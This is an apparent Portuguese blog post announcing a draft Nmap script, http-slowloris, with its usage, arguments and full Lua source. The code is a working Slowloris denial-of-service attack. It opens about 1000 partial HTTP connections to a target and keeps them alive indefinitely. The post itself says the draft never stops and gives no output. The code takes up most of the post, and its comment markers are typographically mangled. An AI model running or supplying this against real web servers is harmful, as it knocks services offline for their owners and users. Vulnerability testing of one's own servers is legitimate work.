O desenvolvimento de scripts para o Nmap anda a toda velocidade. Atendendo a pedidos na NSE Wiki o desenvolvedor Ange Gutek disponibilizou o draft de um script que detecta se o servidor está vulnerável a ataques de DoS usando o Slowloris.

De acordo com Gutek nesse momento o script fará o ataque sem saber se foi bem sucedido ou não, também não gera nenhuma saída e rodará para sempre. O monitoramento é feito através do modo debug (-d).

Sintaxe:

nmap –script http-slowloris –script-args [ARGUMENTOS] [ALVO]

Argumentos:

http-slowloris.threads – Número máximo de conexões concorrentes, se o alvo for Windows esse valor limita-se a 130.

http-slowloris.timeout – Tempo de espera antes de enviar novos dados httpheader. Padrão 100 segundos.

Gutek está convocando contribuidores para ajudar no aprimoramento do script.

Código:

description = [[
Tests a webserver against the Slowloris DoS attack, as it was described at Defcon 17 by RSnake
(see http://ha.ckers.org/slowloris/)

This script opens and maintains numerous 'half-http' connections until the webserver runs out of ressources,
leading to a denial of service.
When the DoS condition is met the script then stops the attack and returns the payload datas as they could be usefull to tweak further filtering rules:
- Time taken until DoS
- Number of threads used
- Number of queries sent (or: amount of datas sent, in bytes)

TODO
o Add a stopping mechanism
+ reserve a thread to monitor the webserver from time to time. If not responding, then stop.
o Analyze the threads: if the number of effective connections is lower than required by the script, maybe notify of a potential filtering rule ahead.
o Add user-supplied arguments:
+ threads, the max number of concurrent connections on the target: on Windows it seems to be limited to 130
+ timeout, time to wait before sending new http header datas in order to maintain the connection. Defaults to 100 seconds, but could be measured as slowloris.pl does

]]

—
– @usage
– nmap –script http-slowloris –script-args http-slowloris.threads=500 http-slowloris.timeout=200
–
– @args http-slowloris.threads The max number of concurrent connections on the target: on Windows it seems to be limited to 130.
– @args http-slowloris.timeout Time to wait before sending new http header datas in order to maintain the connection. Defaults to 100 seconds.
–
– () output
– 80/tcp open http syn-ack
– | http-slowloris: Target was DoSed:
– | the attack took to succeed
– | with concurrent connections
– |_ with sent

author = “Ange Gutek”

license = “Same as Nmap–See http://nmap.org/book/man-legal.html”
categories = {“dos”, “intrusive”}

require “shortport”
require “stdnse”

portrule = shortport.http

action = function(host, port)

math.randomseed(os.time())
local output,i
local threads = {}
nmap.registry.slowloris = {}
nmap.registry.slowloris['threads']=1

— Threaded function ——————————————————————
local doHalfhttp = function(host,port)
local get_uri = math.random(100000, 900000) — we will query a random page
— create socket
local slowloris = nmap.new_socket()
local catch = function()
slowloris:close()
end
local try = nmap.new_try(catch)
try(slowloris:connect(host.ip, port))

— Build a half-http header. Maybe the user-agent string should outline Nmap instead ?
local half_http = “GET /”..get_uri..” HTTP/1.1\r\n”
half_http = half_http..”Host: “..host.ip..”\r\n”
half_http = half_http..”User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n”
half_http = half_http..”Content-Length: 42\r\n”

try(slowloris:send(half_http))
local count = nmap.registry.slowloris['threads'] — retrieve the number of already effective connection

count = count + 1
nmap.registry.slowloris['threads']=count
stdnse.print_debug(1, “%s: USING %d THREADS)…”, SCRIPT_NAME, nmap.registry.slowloris['threads'])

local queries = 2
while true do
— this is where we set the time to wait before maintaining the connection by sending a new line to the http header
— this value would be more efficient if it was just below the target timeout
stdnse.sleep(100)
try(slowloris:send(“X-a: b\r\n”))
queries = queries + 1
queries = queries * nmap.registry.slowloris['threads']
stdnse.print_debug(1, “%s: SENT %d QUERIES SO FAR (using %d threads)…”, SCRIPT_NAME, queries,nmap.registry.slowloris['threads'])
end

end
— ————————————————————————————

— Main
for i=1,1000 do — Number of threads to launch
local co = stdnse.new_thread(doHalfhttp, host, port)
threads[co] = true
end
return output

end